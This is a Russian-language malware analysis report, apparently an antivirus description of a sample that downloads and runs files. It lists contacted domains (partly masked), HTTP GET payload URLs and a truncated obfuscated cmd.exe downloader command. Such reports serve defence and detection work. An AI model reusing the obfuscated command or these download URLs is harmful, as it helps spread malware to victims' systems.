Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set 5d=ScvHjUjGuuApzRCmhzKSvQX1DF7ed\, ;IWT4P{2xNwgt0@:'f}y\8rb6)l+Oks.in(oa=$J-B&&for %v in (70,16,15,6,69,48,42,11,41,48,32,70,64,37,34,69,65,27,4...
Сетевая активность
Подключается к
- 'ad#####chnologies.com':80
- 'de######ldegeneratoare.ro':80
- 'de######ldegeneratoare.ro':443
- 'au#####ajavision.com':80
- 'au#####ajavision.com':443
TCP
Запросы HTTP GET
- http://de######ldegeneratoare.ro/jGIpmPwB0G
- http://au#####ajavision.com/eRflf0H
Другие
- 'de######ldegeneratoare.ro':443
- 'au#####ajavision.com':443
UDP
- DNS ASK ad#####chnologies.com
- DNS ASK em###iflex.com
- DNS ASK de######ldegeneratoare.ro
- DNS ASK au#####ajavision.com
- DNS ASK js###venews.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set 5d=ScvHjUjGuuApzRCmhzKSvQX1DF7ed\, ;IWT4P{2xNwgt0@:'f}y\8rb6)l+Oks.in(oa=$J-B&&for %v in (70,16,15,6,69,48,42,11,41,48,32,70,64,37,34,69,65,27,4...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"set 5d=ScvHjUjGuuApzRCmhzKSvQX1DF7ed\, ;IWT4P{2xNwgt0@:'f}y/8rb6)l+Oks.in(oa=$J-B&&for %v in (70,16,15,6,69,48,42,11,41,48,32,70,64,37,34,69,65,27,42,72,67,55,6,27,1,44,31,41,27,44,63,34,2...
